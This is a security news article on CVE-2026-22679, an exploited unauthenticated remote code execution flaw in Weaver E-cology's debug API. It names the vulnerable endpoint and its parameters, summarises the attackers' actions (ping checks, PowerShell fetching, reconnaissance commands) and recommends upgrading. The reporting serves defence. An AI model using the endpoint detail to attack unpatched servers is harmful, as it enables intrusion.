Weaver E-cology RCE Flaw Under Active Exploitation via Debug API
A critical, actively exploited remote code execution vulnerability in the Weaver E-cology platform is allowing unauthenticated attackers to execute arbitrary commands via an exposed debug API.
A critical unauthenticated remote code execution (RCE) vulnerability in the Weaver E-cology enterprise office automation platform is currently being exploited in the wild. Tracked as CVE-2026-22679, the flaw carries a CVSS score of 9.8 and affects Weaver E-cology 10.0 versions released prior to March 12, 2026 The Hacker News BleepingComputer.
The vulnerability stems from an exposed debug API endpoint located at `/papi/esearch/data/devops/dubboApi/debug/method`. This endpoint improperly allows user-supplied parameters to reach backend Remote Procedure Call (RPC) functionality without requiring authentication or input validation BleepingComputer. By crafting POST requests with specific `interfaceName` and `methodName` parameters, an attacker can trigger command-execution helpers, effectively turning the debug interface into a remote command execution tool The Hacker News.
Vega Research Team identified active exploitation of this flaw beginning as early as March 17, 2026—just five days after the vendor released the necessary security patches The Hacker News. The Shadowserver Foundation later confirmed signs of exploitation starting on March 31, 2026 The Hacker News. While the platform is primarily utilized by organizations in China, the ease of access to the debug endpoint has made it a target for threat actors seeking to compromise internal business process management systems BleepingComputer.
During the observed campaign, attackers attempted to verify RCE capabilities by triggering ping commands to external infrastructure before moving to payload delivery. The activity included failed attempts to deploy an MSI installer named "fanwei0324.msi" and repeated efforts to fetch obfuscated, fileless PowerShell scripts BleepingComputer. Throughout the intrusion, attackers executed standard reconnaissance commands such as `whoami`, `ipconfig`, and `tasklist` The Hacker News. Despite these efforts, researchers noted that the attackers failed to establish persistent sessions on the targeted hosts BleepingComputer.
Weaver has addressed the vulnerability in build 20260312, which completely removes the susceptible debug endpoint BleepingComputer. There are no alternative mitigations or workarounds available, making an immediate upgrade to the latest version the only recommended course of action BleepingComputer. Security researcher Kerem Oruc has released a Python-based detection script to help administrators identify if their instances remain vulnerable The Hacker News.
The exploitation of CVE-2026-22679 highlights the persistent risk posed by debug interfaces left enabled in production environments. Because these endpoints often bypass standard authentication mechanisms, they provide a direct path for attackers to gain system-level access. As threat actors continue to monitor for newly disclosed vulnerabilities, the window between patch release and active exploitation remains dangerously narrow, underscoring the necessity for rapid deployment of security updates in enterprise environments.